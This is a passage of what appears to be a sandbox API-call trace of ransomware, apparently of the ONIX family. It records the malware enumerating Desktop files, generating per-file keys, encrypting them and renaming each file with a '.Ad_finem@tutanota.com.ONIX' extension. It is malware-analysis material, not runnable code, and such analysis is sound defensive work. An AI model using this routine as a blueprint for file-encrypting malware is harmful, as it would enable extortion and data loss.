(in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.122] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.123] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.174] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdf17) returned 0x4d8b68 [0120.175] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdf17) returned 0xf50048 [0120.175] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.176] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0xdf17, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0xdf17, lpOverlapped=0x0) returned 1 [0120.177] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-57111, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.177] WriteFile (in: hFile=0x4a4, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0xdf17, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0xdf17, lpOverlapped=0x0) returned 1 [0120.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.179] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xdf17, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.179] CloseHandle (hObject=0x4a4) returned 1 [0120.180] GetProcessHeap () returned 0x410000 [0120.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.180] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3apbpaevjxgnseo9.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3aPBPaeVJXGnSEo9.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3apbpaevjxgnseo9.swf.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.182] GetProcessHeap () returned 0x410000 [0120.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.183] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccd90340, ftCreationTime.dwHighDateTime=0x1d5da0a, ftLastAccessTime.dwLowDateTime=0xb06b8060, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0xb06b8060, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x17e78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5m-IbNLNRZ.xls", cAlternateFileName="5M-IBN~1.XLS")) returned 1 [0120.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.183] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.183] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.183] GetLastError () returned 0x0 [0120.183] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5m-ibnlnrz.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.183] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.183] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17e78, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.183] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.183] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.184] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.184] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.184] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.184] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.184] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls", dwFileAttributes=0x80) returned 1 [0120.185] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls") returned 53 [0120.185] GetProcessHeap () returned 0x410000 [0120.185] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x460008 [0120.185] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls" [0120.185] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.185] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=97912) returned 1 [0120.185] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17e78 [0120.185] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.185] GetProcessHeap () returned 0x410000 [0120.185] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.185] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.187] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.188] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.190] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17e78) returned 0xf50048 [0120.192] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17e78) returned 0xf67ec8 [0120.192] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.193] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x17e78, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x17e78, lpOverlapped=0x0) returned 1 [0120.195] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-97912, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.195] WriteFile (in: hFile=0x4a4, lpBuffer=0xf67ec8*, nNumberOfBytesToWrite=0x17e78, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf67ec8*, lpNumberOfBytesWritten=0x367f44c*=0x17e78, lpOverlapped=0x0) returned 1 [0120.197] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.198] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf67ec8 | out: hHeap=0x410000) returned 1 [0120.198] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17e78, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.198] CloseHandle (hObject=0x4a4) returned 1 [0120.198] GetProcessHeap () returned 0x410000 [0120.198] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.198] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5m-ibnlnrz.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5m-IbNLNRZ.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5m-ibnlnrz.xls.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.201] GetProcessHeap () returned 0x410000 [0120.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.201] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dcfb20, ftCreationTime.dwHighDateTime=0x1d5e4af, ftLastAccessTime.dwLowDateTime=0xac28afb0, ftLastAccessTime.dwHighDateTime=0x1d5df46, ftLastWriteTime.dwLowDateTime=0xac28afb0, ftLastWriteTime.dwHighDateTime=0x1d5df46, nFileSizeHigh=0x0, nFileSizeLow=0x3036, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8C9XFPWNPCAv7.jpg", cAlternateFileName="8C9XFP~1.JPG")) returned 1 [0120.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.201] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.201] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.201] GetLastError () returned 0x0 [0120.201] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8c9xfpwnpcav7.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.201] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.201] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3036, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.202] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.202] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.202] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.202] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.203] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.203] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.203] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg", dwFileAttributes=0x80) returned 1 [0120.203] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg") returned 56 [0120.203] GetProcessHeap () returned 0x410000 [0120.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe0) returned 0x460008 [0120.203] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg" [0120.203] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.203] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=12342) returned 1 [0120.203] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x3036 [0120.203] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.203] GetProcessHeap () returned 0x410000 [0120.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.203] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.205] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.207] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.208] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.209] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3036) returned 0x4d8b68 [0120.209] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3036) returned 0x4dbba8 [0120.209] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.210] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x3036, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x3036, lpOverlapped=0x0) returned 1 [0120.210] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-12342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.210] WriteFile (in: hFile=0x4a4, lpBuffer=0x4dbba8*, nNumberOfBytesToWrite=0x3036, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dbba8*, lpNumberOfBytesWritten=0x367f44c*=0x3036, lpOverlapped=0x0) returned 1 [0120.211] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.211] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dbba8 | out: hHeap=0x410000) returned 1 [0120.211] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3036, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.211] CloseHandle (hObject=0x4a4) returned 1 [0120.212] GetProcessHeap () returned 0x410000 [0120.212] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.212] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8c9xfpwnpcav7.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8C9XFPWNPCAv7.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8c9xfpwnpcav7.jpg.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.217] GetProcessHeap () returned 0x410000 [0120.217] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.217] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.217] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.217] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.217] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71df2eb0, ftCreationTime.dwHighDateTime=0x1d5e766, ftLastAccessTime.dwLowDateTime=0x2a457680, ftLastAccessTime.dwHighDateTime=0x1d5e5be, ftLastWriteTime.dwLowDateTime=0x2a457680, ftLastWriteTime.dwHighDateTime=0x1d5e5be, nFileSizeHigh=0x0, nFileSizeLow=0x9e54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bP4QhJNMiwpUMLCJp9Em.gif", cAlternateFileName="BP4QHJ~1.GIF")) returned 1 [0120.217] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.217] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.217] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.217] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.217] GetLastError () returned 0x0 [0120.217] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bp4qhjnmiwpumlcjp9em.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.217] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.217] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9e54, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.217] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.218] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.218] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.218] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.219] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.219] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.219] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif", dwFileAttributes=0x80) returned 1 [0120.219] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif") returned 63 [0120.219] GetProcessHeap () returned 0x410000 [0120.219] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x449878 [0120.219] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif" [0120.219] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bP4QhJNMiwpUMLCJp9Em.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.219] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=40532) returned 1 [0120.219] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x9e54 [0120.219] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.219] GetProcessHeap () returned 0x410000 [0120.219] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.219] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.219] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.221] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.222] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.223] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9e54) returned 0x4d8b68 [0120.223] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9e54) returned 0xf50048 [0120.224] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.224] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x9e54, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, 